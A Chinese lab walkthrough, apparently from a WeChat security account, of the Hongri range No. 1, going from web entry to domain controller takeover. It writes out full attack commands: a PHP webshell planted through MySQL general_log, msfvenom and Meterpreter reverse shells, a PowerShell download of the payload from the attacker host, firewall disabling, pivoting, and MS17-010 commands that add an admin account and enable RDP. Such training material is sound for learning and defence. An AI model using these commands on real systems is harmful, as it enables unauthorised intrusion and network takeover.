本文基于红日靶场(一)的内网渗透演练场景,完整复现攻击者从外网突破到域控接管的完整攻击链条。通过主机发现、端口扫描锁定目标主机,利用Web目录枚举与MySQL弱口令获取数据库权限,并通过日志写入漏洞植入Webshell,进一步通过Meterpreter建立持久会话。随后以内网路由转发与代理穿透技术,结合MS17-010漏洞横向移动至域控及域成员主机,最终通过远程桌面接管整个域环境。
kali:172.16.8.110
Web:172.16.8.101、10.10.10.100
域成员:10.10.10.101
域控:10.10.10.102
环境探测与信息收集
主机发现
使用nmap对目标网段进行存活主机扫描,确定目标主机IP地址:
nmap -sP 172.16.8.0/24
发现目标主机172.16.8.101,确认其为后续攻击目标。
端口扫描与服务识别
对目标主机进行全端口扫描,识别开放服务及版本信息:
nmap -sV -p- 172.16.8.101
发现服务:
80/tcp:Apache HTTP Server 2.4.23(Windows环境,PHP 5.4.45)
3306/tcp:MySQL服务
Web渗透与初始突破
目录枚举与漏洞发现
通过dirb工具枚举Web目录:
dirb http://172.16.8.101/
发现敏感路径:
http://172.16.8.101/phpmyadmin/
http://172.16.8.101/phpMyAdmin/
phpMyAdmin弱口令利用
尝试使用默认凭据root:root登录phpMyAdmin,成功获取数据库管理权限。
Webshell植入
开启MySQL日志功能
通过SQL命令修改日志路径为Web目录,并写入PHP Webshell:
SET global general_log='on';
SET global general_log_file="C:/phpStudy/WWW/shell.php";
show variables like '%general%';
SELECT 1;/* <?php system($_GET['shell']); ?> */
此时访问http://172.16.8.101/shell.php?shell= 命令即可执行系统命令。
通过Webshell下载并执行Payload
使用Metasploit生成反向TCP Payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.8.110 LPORT=8888 -f exe -o shell.exe
启动HTTP服务提供Payload下载:
python -m http.server 80
通过Webshell触发下载与执行:
http://172.16.8.101/shell.php?shell=powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.8.110/shell.exe','shell.exe')
Meterpreter监听
在Metasploit中设置监听模块,获取Meterpreter会话:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.16.8.110
set lport 8888
run
执行shell
http://172.16.8.101/shell.php?shell=.shell.exe
权限维持与内网横向移动
权限维持
通过进程迁移和命令提权至NT AUTHORITYSYSTEM权限。
getsystem
ps
migrate 1156
getpid
getuid
域环境信息收集
关闭防火墙
netsh advfirewall set allprofiles state off
查看网络配置
ipconfig /all
确认域名为god.org,内网网段为10.10.10.0/24。
内网主机发现
for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.10.10.%I | findstr "TTL="
通过Ping扫描发现存活主机10.10.10.100、10.10.10.101、10.10.10.102。
域控识别
net group "domain admins" /domain
ping owa.god.org
确认域控为owa.god.org(IP: 10.10.10.102)。
内网路由与代理配置
添加内网路由
在Metasploit中添加内网路由
run get_local_subnets
run autoroute -s 10.10.10.0/24
run autoroute -p
background
设置SOCKS代理
设置SOCKS代理(端口8000)穿透内网:
use auxiliary/server/socks_proxy
set SRVPORT 8000
run
配置proxychains4文件
vim /etc/proxychains4.conf
扫描内网主机端口
通过proxychains扫描内网主机端口,发现域控开放SMB服务(445端口)。
proxychains4 nmap -Pn -sT -p 22,80,135,443,445,3389 10.10.10.102
域控与域成员渗透
利用SMB漏洞执行命令
使用Metasploit的ms17_010_command模块攻击域控(IP: 10.10.10.102):
use auxiliary/admin/smb/ms17_010_command
setcommand net user
set RHOST 10.10.10.102
setcommand netsh advfirewall set allprofiles state off
run
setcommand net user hack999 999@Hack /add
run
setcommand net localgroup administrators hack999 /add
run
setcommand'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
run
远程桌面连接
通过代理连接域控的远程桌面:
proxychains4 rdesktop 10.10.10.102:3389
使用新建的凭据hack999:999@Hack成功登录域控。
域成员主机渗透
对域成员10.10.10.101重复相同攻击流程:
关闭防火墙
添加用户并提权
开启远程桌面
最终通过proxychains4 rdesktop 10.10.10.101:3389接管域成员主机。
攻击总结
初始入口
通过Web服务的弱口令与日志写入漏洞获取Webshell。
权限维持
利用Metasploit生成Payload建立持久会话。
内网扩展
通过路由和代理穿透内网,结合SMB漏洞横向移动。
域控接管
最终控制域控(owa.god.org)及域成员(ROOT-TVI862UBEH.GOD.org)。
红队全栈教学
可在公众号回复“红队”获取群链接
OSCP+
原文始发于微信公众号(泷羽Sec-Ceo):红日靶场(一):从外网到域控
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论